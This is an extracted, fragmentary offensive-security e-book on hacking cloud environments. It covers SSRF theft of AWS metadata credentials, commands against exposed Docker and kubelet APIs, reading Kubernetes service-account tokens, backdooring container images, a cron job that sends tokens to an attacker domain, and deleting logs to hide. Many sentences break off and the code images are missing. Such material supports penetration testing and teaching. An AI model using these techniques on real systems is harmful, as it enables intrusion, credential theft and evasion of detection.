Cloud Hacking Playbook
Cloud Hacking Playbook
Table Of Contents
Table Of Contents 2
Introduction 7
Cloud Basics 9
Introduction 9
Providers 9
Types of Cloud Computing 10
Cloud Computing Services 11
IAM 12
Virtual Servers 13
Virtual Private Cloud 13
Storage 14
Databases 14
Serverless 14
Containers 15
Pub/Sub 16
Conclusion 17
Cloud Hacking Basics 19
Introduction 19
Initial Access 20
SSRF 20
Source Code 21
Cloud Provider CLI 21
Environment Variables 21
Phishing 21
Cookies 22
Privilege Escalation 22
IAM 22
Source Code 23
Exploits & Misconfigurations 23
Lateral Movement 23
Enumeration 24
IAM 24
Infrastructure 24
Collection 25
2
Alex Thomas AKA Ghostlulz
Persistence 25
IAM 25
Infrastructure 26
Defense Evasion 26
Logging 26
Noisy logs 27
Conclusion 27
Docker Hacking 29
Introduction 29
Docker Basics 29
Initial Access 31
Exposed Docker API 31
Privilege Escalation 33
Privileged User 34
Docker Sock 35
Persistence 36
Docker backdoor 36
Conclusion 38
Kubernetes Hacking 39
Kubernetes Basics 39
Architecture 39
RBAC AKA IAM 40
Mitre Attack for Kubernetes 42
Initial Access 43
Exposed API 43
Privilege Escalation 47
RBAC - List Secrets 47
RBAC - Pod Exec 48
RBAC - Impersonate 49
Enumeration 50
Can I 50
Infrastructure 51
Secretes 53
ConfigMap 54
Persistence 55
CronJob 55
Conclusion 56
3
Alex Thomas AKA Ghostlulz
4
Alex Thomas AKA Ghostlulz
5
Alex Thomas AKA Ghostlulz
6
Alex Thomas AKA Ghostlulz
Cloud Hacking
Introduction
Over the past few years cloud computing has become increasingly popular. You no
longer need to buy servers and hardware to run your infrastructure, it can all be done in
the cloud. This is the new way of doing things. However, where there is a shift in
technology there will be a shift in security, a whole new playground has opened up and
it's in the cloud. The first two chapters give you a very basic run down of cloud
technology and cloud hacking. After that things get a little more technical and I teach
you the fundamentals of container and kubernetes hacking. Next we will go over the
hacking. Finally, we will go over Google Cloud Platform(GCP) which is another cloud
provider. Throughout the chapters I try to go over the technology first then I talk about
the fun stuff which is hacking. It’s important that you understand the technology you are
hacking on. If you don’t know what elastic beanstalk is then how will you know what to
look for when you come across that technology? If you want to get good at cloud
hacking it would be beneficial to read supplementary material around dev ops in the
7
Alex Thomas AKA Ghostlulz
cloud,cloud administration, and each service cloud providers offer. A lot of cloud
8
Alex Thomas AKA Ghostlulz
Cloud Basics
Introduction
Before you can hack the cloud you must first understand the cloud and everything it
offers. Once you have the necessary prerequisite knowledge you can start the actual
fun part, hacking. You may be tempted to skip over this part but I can assure you the
only way to truly know what you are doing when hacking the cloud is by having a deep
Providers
When you think of cloud computing the first thing that pops in your head is probably
Amazon Web Services (AWS). They are by far the most popular platform out there
holding a significant size of the market share but there are others as well as shown
below.
Country Provider
USA Amazon Web Services(AWS)
USA Azure
9
Alex Thomas AKA Ghostlulz
There are a lot of cloud providers out there but they all pretty much offer the same
services.
● Software-as-a-service (SaaS)
○ Pay to use some sort of software, for example Office 365, Dropbox, and
Slack and all considered SaaS. All you have to do is login and you can
● Infrastructure-as-a-service (IaaS)
● Platform-as-a-service (PaaS)
○ Pay to host an application, for example you might upload your back end
API to a PaaS system making it available to the world. You only have to
worry about your source code; everything else is taken care of by the
cloud provider.
10
Alex Thomas AKA Ghostlulz
For the most part every cloud provider offers similar services. For example suppose you
want to spin up a virtual machine, if you're using AWS you would create an EC2
instance but if you're using Google Cloud you would create a Compute instance, both of
these do the same thing (create a virtual machine) the only difference is their name.
11
Alex Thomas AKA Ghostlulz
To understand the different techniques used to hack the cloud you must first understand
the technologies used by cloud providers. The following sections are meant to give you
a brief explanation of different cloud services so if you are unfamiliar with this stuff you
will probably have to read a few blogs and watch a few youtube videos to gain
additional insights.
IAM
Identity and Access Management (IAM) is a framework of policies and technologies for
ensuring that the proper people in an enterprise have the appropriate access to
technology resources. Basically you can think of this as your Active Directory. You can
manage your users, groups, and their associated permissions from here.
12
Alex Thomas AKA Ghostlulz
From an attacker's perspective one of the most important things about IAM is your
associated permissions. Cloud providers have very granular permissions which give you
access to specific resources. Several phases of the cloud hacking process rely on
permissions so it's important that you understand how each cloud provider implements
this feature. Also note that almost all of the privilege escalation techniques in the cloud
rely on misconfigured IAM permissions so it's definitely something you are going to want
to learn.
Virtual Servers
Instead of buying a physical server you will be using virtual servers. The only real
difference between virtual and physical servers is that you won’t have physical access
to the hardware, instead you will use SSH or RDP to interact with your machine.
Your virtual private cloud(VPC) is your network, instead of having your network live on
premise it is held in the cloud. All of your virtual servers and other machines will live in
your VPC and will be given a local IP just like any other device on your local network. A
13
Alex Thomas AKA Ghostlulz
Storage
Storage buckets provide a place for you to store images, documents, files, and anything
else you want. Instead of buying a NFS, second hard drive, or an FTP server you can
Databases
If your application needs to store and retrieve information you probably need some sort
instance and you're all set. You can easily spin up your databases with a click of a
button
Serverless
application and running it on a machine you create small functions which can be called
via an API call or some other trigger. If you call a function 100 times in a second it will
scale up to 100 machines, run the function then exit. Instead of paying for an entire
server you only pay for the time and CPU power your function used when it was called.
14
Alex Thomas AKA Ghostlulz
As shown above the main difference is that serverless programming breaks the
Containers
With the rise of devops and the cloud comes containers. A container lets you wrap up
your application in an image that can run on any machine regardless of the operating
system and libraries on it. Most cloud providers will have a container registry which is
used to house all of your docker containers. These providers will also have different
15
Alex Thomas AKA Ghostlulz
Pub/Sub
Another thing you will likely see in a cloud environment is some sort of pub/sub service.
16
Alex Thomas AKA Ghostlulz
As shown in the above image you could have two microservices publishing messages
to a topic. Then you could have three other microservices consuming the messages and
performing some sort of work. This is how multiple microservices can communicate with
each other.
Conclusion
In order to understand cloud hacking you must first understand cloud technology. Old
school networks hosted everything locally. Your users, groups, and permissions were in
an active directory server, virtual servers were hosted in vmware, and databases were
hosted on physical servers in the server room. The main takeaway you need to know
now is that all of these servers have been moved to the cloud. Instead of using a NFS
server to store files you now use the cloud provider's storage bucket. The basic
principles are the same “storing files” but the technology is slightly different. In addition
17
Alex Thomas AKA Ghostlulz
to that there are also some new concepts such as containers , serverless programming,
18
Alex Thomas AKA Ghostlulz
Introduction
No matter what cloud provider you are trying to hack you will most likely follow the same
methodology. All the major cloud providers offer similar services so if you know the
basic principles of cloud hacking you can apply the techniques to all of them, though the
technical details on how the hacks are carried out will vary depending on the cloud
provider. After hacking on multiple cloud providers I came up with the following
1. Initial Access
2. Enumeration
3. Privilege escalation
4. Repeat step 1 - 3
5. Persistence
6. Clean up tracks
19
Alex Thomas AKA Ghostlulz
In the following sections I'll talk briefly about the attack cycle . In depth technical
Initial Access
Before you can do anything you need to first gain access to the target's cloud
environment. There are several techniques for doing this; it is up to you to decide which
technique to utilize.
SSRF
As of right now the most popular method for gaining access to a cloud environment is
server side request forgery(SSRF). I won't go into detail on the vulnerability as there are
plenty of references online but basically SSRF is a technique used to gather cloud
credentials from the metadata service. Attackers can then use these credentials to login
to the target's cloud environment. If you want to learn more about SSRF checkout the
links below:
● https://portswigger.net/web-security/ssrf
● https://cobalt.io/blog/a-pentesters-guide-to-server-side-request-forgery-ssrf
● https://www.youtube.com/watch?v=66ni2BTIjS8&ab_channel=HackerOne
20
Alex Thomas AKA Ghostlulz
Source Code
looking through the target source code for hard coded credentials. Developers love hard
coding credentials so it's not uncommon to find AWS, Gcloud ,Azure, and other cloud
provider credentials being leaked on Github and other source code repositories . Also if
you ever compromise a host make sure to check for scripts on that host that contain
credentials.
Regular users like to use the browser but admins live in the terminal. Most cloud
providers will also have their own CLI which can be used via the command line. These
tools need to be able to authenticate to the cloud provider which means the credentials
are typically stored on disk. These credentials can be found in various locations
Environment Variables
Another popular place to store cloud credentials is in environment variables. If you ever
Phishing
Phishing is a classic attack for compromising companies so it's no surprise that it can be
used to compromise cloud credentials as well. Just create a fake login page that looks
21
Alex Thomas AKA Ghostlulz
Cookies
If you compromise your target machine and they are logged into a cloud provider you
can easily steal their cookies. An attacker could then use those cookies to login as that
Privilege Escalation
Cloud environments have two types of privilege escalation and lateral movement
techniques. One involves targeting cloud users and the other involves targeting the
infrastructure.
IAM
If you're looking for privilege escalation your best bet is to examine IAM permissions,
specifically what permissions your current user has. The majority of privilege escalation
flaws are due to overly permissive accounts. Cloud IAMs can have thousands of
permissions to choose from so it's very easy and common for administrators to give
22
Alex Thomas AKA Ghostlulz
Source Code
There are other ways to escalate your privileges beyond IAM policies and permissions.
For instance if you get a shell on a cloud VM or docker container you could search
through all the source code and scripts on that machine for hard coded passwords.
You're not always going for user accounts, sometimes you may be trying to get root on
a box or you want to break out of a containerized environment. These attacks are about
gaining additional privileges on the cloud infrastructure, not the cloud users. This type of
attack is more similar to traditional pentesting and red teaming than being cloud
specific.
Lateral Movement
The biggest thing to understand is that cloud lateral movement is different from network
based lateral movement though you can also perform network based lateral movement
within a cloud environment. With cloud based lateral movement we are trying to
compromise other users within the cloud. For the most part all the techniques and
tactics used for privilege escalation can also be used for lateral movement.
23
Alex Thomas AKA Ghostlulz
Enumeration
IAM
This phase is about determining what you can access. As I've mentioned before, IAM
permissions determine what you can and can't do within the cloud environment. You
need to map out what you can and can't do. You might have restricted permissions to
Infrastructure
Everything that can be found on your local network can be spun up in the cloud. You
also need to know the infrastructure they have spun up such as:
● Virtual Machines
● Databases
● Cloud Storage(Buckets)
● Load Balancers
● VPCs
● WAFs
● Cloud Functions(Serverless)
● Kubernetes Environment
24
Alex Thomas AKA Ghostlulz
● Publish/Subscribe Systems
● Ect
Basically you want to build a network diagram of the cloud infrastructure so you can get
Collection
Once you figure out what you have access to you can start searching for and
database server you might try to make a backup and download it locally. If you have
access to a docker image you might download the image and inspect it for hard coded
credentials and other vulnerabilities. Depending on what you have access to this step
will vary.
Persistence
When you compromise a cloud environment it can be short lived unless you set up
some kind of persistence in the environment. Note, you can have persistence within the
25
Alex Thomas AKA Ghostlulz
IAM
Generally you are going to want to have persistence within the cloud environment. This
means you are going to need a set of credentials giving you access to the cloud
environment. There are several techniques for setting up persistence and like
everything else it depends on what permissions your user has. The most common and
easiest techniques are creating new users and creating API tokens/keys for existing
users.
Infrastructure
You can also persist in the cloud environment via traditional methods. For example you
attacker controlled ssh keys to servers. We don't talk much about this type of
Defense Evasion
Cloud providers are really good at logging absolutely everything. While interacting with
the cloud environment you will be generating a lot of noise. There are a few techniques
Logging
Every cloud provider has some sort of logging capabilities. Just like traditional methods
one of the biggest ways to hide yourself is to simply delete the logs or disable logging.
26
Alex Thomas AKA Ghostlulz
Noisy logs
As stated earlier cloud providers seem to log everything. This can sometimes make it
hard to find your actions as there is a sea of data. If you dont look suspicious you might
be able to fly under the radar. However, you should note if you are uncovered they will
Conclusion
Most cloud providers offer very similar services so if you know how to attack one cloud
provider you can apply that knowledge to attack another. No matter what cloud provider
you are attacking you can allows following the following steps:
1. Initial Access
2. Enumeration
3. Privilege escalation
4. Repeat step 1 - 3
5. Persistence
6. Clean up tracks
27
Alex Thomas AKA Ghostlulz
The only thing that will change are the technical steps involved in each phase. For
example every cloud provider has a metadata url which can be leveraged by an SSRF
vulnerability to expose user credentials. This attack is part of the initial access phase
and can be leveraged for each cloud provider. The only difference is the technical steps
involved. In this chapter you learned the high level attacks involved in attacking a cloud
provider, in the next chapters we will get into the technical steps.
28
Alex Thomas AKA Ghostlulz
Docker Hacking
Introduction
Before I start talking about the cloud I think it is important that I go over containers and
how it has completely changed the way we do things. If you run into a cloud
environment there is a chance they are using containers as they seem to compliment
each other very well. Before we had containers there were issues with software running
fine on one computer but completely failing on another. When you deploy a piece of
software you have to make sure that endpoint has the correct operating system,
libraries, and dependencies or else it wont work. If I'm running a Mac with python
version 2.7 and the software is built for linux running python 3 then I'll run into a bunch
of issues when trying to run the program on my Mac machine. Containers help solve
this problem by creating a virtual environment AKA image that contains your operating
system, libraries, dependencies and anything else you need to run the software. You
can then take that container and run it on any machine and it will work perfectly.
Docker Basics
If an organization is using containers they are most likely using Docker to create those
application source code with the operating system (OS) libraries and dependencies
29
Alex Thomas AKA Ghostlulz
As you can see in the above image the way we deploy an application with Docker is a
little different than what we are used to. Docker runs on your host operating system and
30
Alex Thomas AKA Ghostlulz
As shown above when a client is trying to build an image they can issue the “docker
build” command. This command will build your docker image which contains the
operating system, application code, dependencies, and everything else. Once the
image is built you can save that to the container registry. A container registry is a
and container-based application development. Now you're all set, if you want to deploy
your image you just have to pull it from the container registry and run it.
Initial Access
When you install docker on a system it will expose an API on your local host located on
port 2375. This API can be used to interact with the docker engine which basically gives
Under these conditions no external party will be able to access your docker API as it
isn't exposed to the world. However, this API can be changed so that it can be accessed
by external resources. If done improperly this will expose the docker API to the world as
31
Alex Thomas AKA Ghostlulz
To confirm that a desired host is running Docker you can make a GET request to the
/version endpoint. This will print out a json blob as shown below:
32
Alex Thomas AKA Ghostlulz
Once you have confirmed that the docker API is exposed I will generally move to the
CLI version of docker. From the CLI you can execute the following command to get a list
● docker -H <host>:<port> ps
As you can see in the above image we have a single container running on port 80 with
the name of elegant_easley. We can easily pop a shell on this container by running the
following command:
As you can see in the above image we were dumped right into a root shell. From there
we can do all kinds of things, depending on the docker version you may be able to use
an exploit to break out of the container into the host machine. You aren't just limited to
popping a shell on their docker container, you can do other things such as deploying
your own docker containers. This technique was widely used by crypto currency miners
Privilege Escalation
If you get RCE on an application that is running inside of a container you are essentially
stuck in that container. Containers typically aren't long lived so if you plant your
backdoor in a container it will disappear when the container is updated or swapped out.
33
Alex Thomas AKA Ghostlulz
To prevent all your hard work from being lost you need to break out of the container into
Privileged User
Docker images can be run with the “--privileged” flag which disables all the safeguards
and isolation provided by Docker. If a container has been run with this flag it is pretty
much game over as you will be able to access the host file system. If you run “fdisk -l”
and receive output you can assume your container is running as privileged because if it
The only thing left to do is mount the host file system at “/dev/sda1”. From there you can
You could also try the following POC exploit code which takes a slightly different
34
Alex Thomas AKA Ghostlulz
Docker Sock
Docker.sock is a Unix socket that enables the Docker server-side daemon, dockerd, to
communicate with its command-line interface via a REST API. The socket appears as
the /var/run/docker.sock file. Because it is a file, admins can share and run docker.sock
within a container and then use it to communicate with that container. A container that
runs docker.sock can start or stop other containers, create images on the host or write
to the host file system. What all this means is that when you are running the “docker”
Sometimes developers will mount the docker socket inside a docker container so they
can manage other containers. This is typically done with the following command:
the docker socket inside the docker container. All an attacker has to do is download the
docker CLI and they will have full control over the docker API which would allow them to
delete containers, create containers, execute commands, or whatever else they wanted.
35
Alex Thomas AKA Ghostlulz
Persistence
Docker backdoor
Once you have access to the docker CLI, API, or Socket you can do all kinds of things.
As an attacker you may want to maintain some level of persistence and one of the
easiest ways of doing this is backdooring the target's docker images. If you plant
malware in a target's docker image everytime the image is used to spin up a container
Backdooring a docker image is relatively easy. The first step is to gain access to the
image. Once you have the image downloaded locally you can use that image as a base
In this example I'll pull the “hello-world” docker image and use that as a base for our
backdoor. You can use the “docker pull” command to download an image locally. If you
36
Alex Thomas AKA Ghostlulz
have compromised the target container repository this is where you would want to pull
Now that we have our target image we need to create a docker file which uses this
As shown above we first use the target image as our base. Next we copy our backdoor
to the image and we use python to execute it. I'm using a python backdoor but
technically you could use anything. You can then turn this Dockerfile into an image
using the “docker build” command. Finally upload the image back into the target's
container repository replacing the legit image with our backdoored version. Once the
container is run the backdoor will execute giving you access to the instance.
37
Alex Thomas AKA Ghostlulz
This is the manual way of doing this but there are a few tools which can be used to
● https://github.com/cr0hn/dockerscan
● https://github.com/RhinoSecurityLabs/ccat
Conclusion
If you're dealing with a company running on the cloud there is a very high chance they
are also leveraging container technology. AWS, GCP, Azure, and every other cloud
provider has several services related to containers. This is why you need to know how
38
Alex Thomas AKA Ghostlulz
Kubernetes Hacking
Kubernetes Basics
Docker is nice because you can containerize all of your applications and run them
anywhere. However, managing these docker containers can be difficult which is where
Architecture
machine. Each node can contain several Pods. Pods are the smallest, most basic
containers. When a Pod runs multiple containers, the containers are managed as a
39
Alex Thomas AKA Ghostlulz
What's nice about kubernetes is that it manages the deployment of your containers
automatically. If you want to have one container running on each node you can easily
do that, if you want to instantly scale up your containers so there are 1,000 instances
you can do that too. Kubernetes makes orchestrating the deployment of your containers
extremely easy.
network resources based on the roles of individual users within your organization. In
kubernetes you can have either a role or cluster role which defines your permissions.
The main difference between a role and a cluster role is that a role must be attached to
40
Alex Thomas AKA Ghostlulz
When creating a role or cluster role you must specify the operation and its
corresponding resources. For example if you could use the operation “get” on the
resource “secrets” which would allow any user attached to that role the ability to list
kubernetes secrets.
41
Alex Thomas AKA Ghostlulz
In the image below you can see what this role might look like. The role type is set to
Finally this role can invoke the “get”, “watch”, and “list” commands on the “secrets”
resource.
Note that these roles are heavily used in the privilege escalation phase as certain
combinations of resources and verbs can give users unintended permissions. After the
The Mitre Attack framework is a comprehensive matrix of tactics and techniques used
by threat hunters, red teamers, and defenders to better classify attacks and assess an
organization's risk. If you have done any type of internal/network pentesting you have
probably heard of The Mitre Attack framework. Microsoft released their own version for
42
Alex Thomas AKA Ghostlulz
We won't be going over all of the attacks in this framework as it would take up the entire
book. However, if you are interested in going a little bit deeper into kubernetes hacking
Initial Access
Exposed API
Kubernetes exposes an unauthenticated REST API on port 10250. If developers are not
careful this API can be exposed to the internet. A quick Shodan search will find a bunch
of these services.
43
Alex Thomas AKA Ghostlulz
Once a Kubernetes service is detected the first thing to do is to get a list of pods by
sending a GET request to the /pods endpoint. The server should respond with
something like:
44
Alex Thomas AKA Ghostlulz
From the above response we get namespace name, pod names, and container names:
● Namespace
○ monitoring
● Pod Name
○ pushgateway-5fc955dd8d-674qn
● Container Name
○ Pushgateway
With this information it is possible to send a request to the API service that will execute
a provided command. This can be done by sending the following GET request:
“https://<DOMAIN>:<PORT>/exec/<NAMESPACE>/<POD
NAME>/<CONTAINER NAME>?command=<COMMAND TO
EXECUTE>&input=1&output=1&tty=1”
After sending the requests you should receive a response similar to the message below:
45
Alex Thomas AKA Ghostlulz
As you can see the above response indicates it was successful and a websocket
connection was created. Note the Location Header value, in this response its value is
equal to /cri/exec/Bwak7x7h.
To handle websocket connections use the tool wscat. This tool can be downloaded by
Now take the location header value which was noted earlier and send the following
As you can see in the above image the command “id” was run on the container and the
46
Alex Thomas AKA Ghostlulz
Privilege Escalation
If a user has a role attached to them which allows them to list secrets they could abuse
this to escalate privileges. When listing all secrets stored in the cluster, one of them will
be an administrative token allowing the attacker to gain the highest possible privileges
in the cluster.
As shown above we were able to dump one of the service accounts tokens which could
47
Alex Thomas AKA Ghostlulz
If your user has the “create” permission on the “pods/exec” resource you can execute
First you must list the names of each running pod. Once you have the names of each
pod you can connect to them(similar to ssh). After that you can read a specific file
containings the pods token. This token can be used to interact with the kubernetes API
As shown in the image above we connect to the pod via the following command:
Once we are connected to the pod we run the cat command to view the token attached
to the pod.
● cat /var/run/secrets/kubernetes.io/serviceaccount/token
48
Alex Thomas AKA Ghostlulz
RBAC - Impersonate
If a user has the ability to impersonate a user or group it could be leveraged for privilege
escalation. As shown below this role has the impersonate verb set for all users. This
means they could execute commands as any user including ones with admin privileges.
As shown in the command above you can use the “--as” command to specify a user to
This same technique could also be used to impersonate groups as well if the
“resources” value was set to “groups” instead of “users”. If we were to exploit this with a
group you could use the default “system:masters” group which is automatically
49
Alex Thomas AKA Ghostlulz
Enumeration
Once you have access to the kubernetes API you need to see what resources you can
access and what data you can collect. This will all be done though the kubernetes CLI
and the results depend on the permissions your current user has. Kuberenetes has a lot
Can I
Kubernetes doesn't have a command to list out all of your permissions and what you
have access to. This means you have to default to trial and error which involves running
50
Alex Thomas AKA Ghostlulz
As shown in the above image we ran the “can-i” command to see if we have access to
secrets. The API responded with “yes” indicating we do. If you need to enumerate what
commands your user has permissions to execute, the “can-i” command is the easiest
option.
Infrastructure
physical server.
I'm typically just looking to see how many nodes there are and their associated IP
addresses. You can use “kubectl get nodes -o yaml” to output a list of nodes and all
their associated information. One of the fields returned will be the node's external IP
address.
51
Alex Thomas AKA Ghostlulz
Knowing the external IP of these nodes could potentially open up additional attacks
depending on what's running on those nodes. Also looking at the ExternDNS you can
see its running on AWS which means an attacker could potentially compromise the
In addition to nodes you should also map out the environment's pods. Pods run on
nodes and represent a specific application. For instance you might have a pod for your
52
Alex Thomas AKA Ghostlulz
Secretes
password, a token, or a key. Using a Secret means that developers don't need to
include confidential data in their application code. However, secrets by default, stored
unencrypted in the API server's underlying data store (etcd). Anyone with API access
can retrieve or modify a Secret, and so can anyone with access to etcd. If an attacker
can access the kubernetes secrets they can potentially leak sensitive information.
As shown in the image above there is a service account token stored as a secret. We
53
Alex Thomas AKA Ghostlulz
ConfigMap
Another popular place to store sensitive data is the config map. According to Google “A
may say it's used to store non confidential data but I see people putting in sensitive data
As shown in the image above the config map is holding a variable called
“AWS_KEY_SECRET”. An attacker could use this key to further compromise the AWS
environment.
54
Alex Thomas AKA Ghostlulz
Persistence
CronJob
If you are familiar with linux cron jobs then this will feel very familiar. Cron jobs can be
used to schedule commands which are run on the specified pod. Since we can run a
bash command on a pod an attacker could read the service account token and send it
to the attacker. The attacker could use this token to authenticate to kubernetes.
Once you have the yaml file created use the following command to create the cron job:
As shown above the cron job is issuing a curl command every day at 1:00am which
domain. Once we have the server account token attached to the pod we can login.
55
Alex Thomas AKA Ghostlulz
Conclusion
If a company is using containers they are probably using kubernetes as well. With that
being said, there is a high probability of you coming into contact with this technology.
There are a lot of developers using kubernetes and there are several ways to
misconfigure the service. Exposing an API could lead to the compromise of every
container in the environment, giving a user the wrong permission could allow that user
to elevate their permissions. Kubernetes is its own world and has its own attack
techniques, it's important that you understand what to do when you see this technology.
56
Alex Thomas AKA Ghostlulz
Introduction
In order to attack AWS you must first understand the ins and outs of AWS, once you
by far the most popular cloud provider in the world. In 2021 they held 31% or 1/3 of the
market share. If you're doing a lot of cloud hacking you're almost guaranteed to come
across AWS at some point. To understand AWS hacking you must first you must first
understand its services. I'll go over some of the important services but this is a cloud
57
Alex Thomas AKA Ghostlulz
AWS CLI
Later in the book when we start attacking the cloud we will be leveraging the CLI to do
almost everything. The AWS CLI is the best hacking tool you can ask for, it can do it all.
Learning this tool will make your life 100% easier as you will be able to perform all the
attacks discussed in this book with a single tool.The first step to using the AWS CLI is to
Once you have your credentials configured you can start issuing commands. As shown
The first argument is the servicename. As you will learn later AWS has hundreds of
services for all kinds of things such as file storage, virtual machines, databases, ground
stations for satellites and everything else you can think of. The second argument is the
subcommand and is used to describe the operation to perform. For example if you
wanted to copy a file from an s3 bucket to your machine you would use the “cp”
58
Alex Thomas AKA Ghostlulz
remember all of them. However, like most tools there is a help command(aws s3 help).
If you don't know how to do some google it or use the help command as shown in the
image above.
Organization
Most of the time you will only be dealing with an AWS account. Your account is where
your environment lives. This is where your network, firewalls, servers, databases, users
59
Alex Thomas AKA Ghostlulz
and everything else are located. Some organizations may want to group multiple AWS
applied to the OU will also be applied to the AWS accounts under it. This makes
managing multiple AWS accounts a lot easier as you only have to apply a setting to the
OU and it will be applied to all AWS accounts under it. Finally at the top of the hierarchy
you have Root. You can think of root as the container for all OUs and accounts.
Anything applied to the root will be applied to everything else under it.
60
Alex Thomas AKA Ghostlulz
IAM
Users
AWS has two kinds of users: root and everything else. The root user is the owner of the
cloud account and has full control over the cloud environment. If the root user gets
61
Alex Thomas AKA Ghostlulz
You can create additional users which can be used to access the cloud environment as
shown in the image above. Unless you get really lucky you will mostly be dealing with
Groups
Groups are a way of clustering several users together. This is really useful when
assigning permissions to a large group of people. As shown in the image above there
are a lot of users in the admin group. If you wanted to add additional permissions to
those users, you would apply a policy to the admin group and it would be applied to the
Role
A role is another type of identity similar to a user. Roles have specific permissions
means other applications, services, and users can perform a task as that role. User A
might not have access to a database but Role B does. If user A is able to assume the
role of Role B then user A would have access to the database as well.
Policy
Policies are used to give users and groups access to specific resources. A policy either
resource you will be able to access it otherwise you will be blocked by default.
62
Alex Thomas AKA Ghostlulz
it would grant them full access to all S3 buckets. AWS comes with hundreds of pre-built
policies but you can also define your own. As a security professional it is very important
that you understand how policies work as they are the backbone of the IAM system.
As an attacker you really want to pay attention to the “Effect”, “Action”, and “Resource”
fields of a policy. In our example the Effect field is set to “Allow”, this means the policy is
giving us access to something, if it was set to “Deny” it would mean we are blocking
access. The Action field specifies what actions we are allowing or denying. In our case
we are allowing all actions associated S3 as denoted by the “*” value. This means we
can list, create, delete, and everything else to S3 buckets. Finally the “Resource” field
specifies which resource our policy applies to. You could specify a specific S3 bucket in
63
Alex Thomas AKA Ghostlulz
there locking us down to a single resource. However the wild card character “*” is used
EC2
spin up a linux or windows machine you are probably going to do it via an EC2 instance.
64
Alex Thomas AKA Ghostlulz
AMI
An Amazon Machine Image(AMI) is a master image for the creation of virtual servers.
The AMI holds the operating system and any default applications you want installed.
The AMI is the base image that is used to install virtual machines.
If you want to install linux you might use the Ubuntu AMI. As shown above there are
EBS
Elastic Block Storage(EBS) acts as a virtual disk for your virtual machine. You can think
65
Alex Thomas AKA Ghostlulz
Security Group
Security groups are like your host based firewall. By default your security group will
To open a specific port you must specify it in the inbound rules. As shown above we are
opening port 80 and it has a source of “0.0.0.0/0”. This means we are allowing
VPC
A Virtual Private Cloud(VPC) is your network and just like a typical local network you
can break it up into subnets. As shown below there is a VPC 10.0.0/16 with two subnets
66
Alex Thomas AKA Ghostlulz
When you create resources such as EC2 instances they live in a VPC and are given a
local IP just like any other network. The VPC is your local network just in the cloud.
Database
RDS
Amazon Relational Database Service (RDS) is a managed SQL database service. Here
you can spin up mysql, oracle, and much more as shown in the below image:
67
Alex Thomas AKA Ghostlulz
These instances are extremely easy to spin up and run on top of EC2 instances.
NoSql
NoSql services are getting increasingly popular and AWS has a couple offerings. You
can use Amazon's DynamoDB managed NoSql service to handle this. You can also use
68
Alex Thomas AKA Ghostlulz
Graph DBS
Graph Databases are also starting to gain popularity and AWS has its own graph
69
Alex Thomas AKA Ghostlulz
S3 Buckets
I'm sure the vast majority of people have heard of S3 buckets but if you have not a S3
bucket is a cloud storage resource. It is the go to place for storing uploaded files,
As you can see above we are storing a bunch of images in this S3 bucket.
Elastic BeanStalk
According to Google AWS Elastic Beanstalk is an easy-to-use service for deploying and
scaling web applications and services developed with Java, . NET, PHP, Node. js,
Python, Ruby, Go, and Docker on familiar servers such as Apache, Nginx, Passenger,
70
Alex Thomas AKA Ghostlulz
As shown in the above image we have our Python API running on beanstalk. All we
have to do is upload our code and the rest of the deployment cycle is taken care of for
you.
Lambda
which the cloud provider allocates machine resources on demand, taking care of the
71
Alex Thomas AKA Ghostlulz
As a programmer all you have to do is write a function and attach a trigger that will
cause your function to be called. This style of development is fairly different from how
Container Register
It's common practice for developers to dockerize applications before deploying them. In
the past you would write a program and it would work fine on your computer but it
wouldnt on your friends. Docker helped solve this issue, if the docker image runs on
your computer it will run on any other computer that has docker installed.
72
Alex Thomas AKA Ghostlulz
If a company is using docker images they have to store them somewhere and it's
common to use the Amazon Container Service. Here you can upload your docker
Container Orchestration
In today's world it's all about app containerization. Most people use something like
Docker when creating images of their application. Now that you have an image of your
ECS
According to AWS “an Amazon ECS cluster is a regional grouping of one or more
container instances on which you can run task requests”. Basically what they are trying
73
Alex Thomas AKA Ghostlulz
What's nice about an ECS cluster is that it takes care of everything for you, once you
create your image just add it to the ECS cluster and you're ready to go. This makes
Kubernetes
ECS is AWS dependent but Kubernetes is the open source equivalent. Kubernetes
74
Alex Thomas AKA Ghostlulz
Similar to ECS all you have to do is upload your application image to your cluster and it
will automatically be deployed. Docker and kubernetes go hand and hand, if a company
is using docker containers they will almost certainly be using something to manage
those containers.
Conclusion
You should now have a basic understanding of a few services AWS offers. However,
there are a hundred other services we didn't go over. If you want to get better at AWS
cloud hacking you need to get better at AWS which means understanding all of the
supplemental material around the various services AWS provides. At the very least you
75
Alex Thomas AKA Ghostlulz
need to understand the AWS CLI, EC2 instances, S3 buckets, IAM, and the other
76
Alex Thomas AKA Ghostlulz
AWS Hacking
Introduction
Now that you have a basic understanding of how AWS works you are ready for the
hacking part. Most of the methodologies and techniques used to hack AWS can be used
on other cloud providers, the only difference is how the attack is pulled. This chapter will
focus on attacking an AWS environment from start to finish. This book will not talk
about any zero days in AWS, we will be leveraging common misconfigurations and legit
functionalities.
Initial Access
The first step of cloud hacking is getting access to the target's cloud environment. There
are a variety of techniques used to get cloud credentials; you just have the pick one that
SSRF
applications which involves forcing a target server to send HTTP requests to a specified
host on your behalf. The HTTP response will then be shown to the attacker, unless
77
Alex Thomas AKA Ghostlulz
you're dealing with blind SSRF. If you get SSRF on a server hosted on Amazon Web
I'm not going to go over how to perform SSRF here but if you don’t know what SSRF is
I'll explain it a little. SSRF allows an attacker the ability to force an application to send
requests on their behalf. This is often used to access resources on the internal network
or resources that are behind a firewall. Portswigger has a good blog post on SSRF if
you want to learn more technical details on how to exploit this vulnerability:
● https://portswigger.net/web-security/ssrf
As described earlier we know that AWS has something called an EC2 instance that
basically acts as a VPS. A lot of companies use these systems to host web applications.
Sometimes these web applications need access to AWS services so instead of hard
coding credentials developers can utilize the Metadata Service to get the user
● https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata
.html
This metadata server can be accessed through the REST API located at
accessible to the local machine, but if accessed by an attacker it could be used to do all
78
Alex Thomas AKA Ghostlulz
As stated earlier SSRF is used to force an application to make HTTP requests while
showing the response to the attacker. Note the attacker must be able to view the
If an application is hosted on an AWS EC2 instance the meta data API located at
credentials could then be used to do all kinds of things depending on their permissions.
Sending a GET requests to the following endpoint will dump a list of roles that are
● http://169.254.169.254/latest/meta-data/iam/security-credentials/
Once you get a list of roles attached to the EC2 instance you can dump their credentials
● http://169.254.169.254/latest/meta-data/iam/security-credentials/%3CROLE_NA
ME_HERE%3E
79
Alex Thomas AKA Ghostlulz
You can then take those credentials and use them with the AWS CLI. This will allow you
to do anything that role has permissions to do. If the role has improper permissions
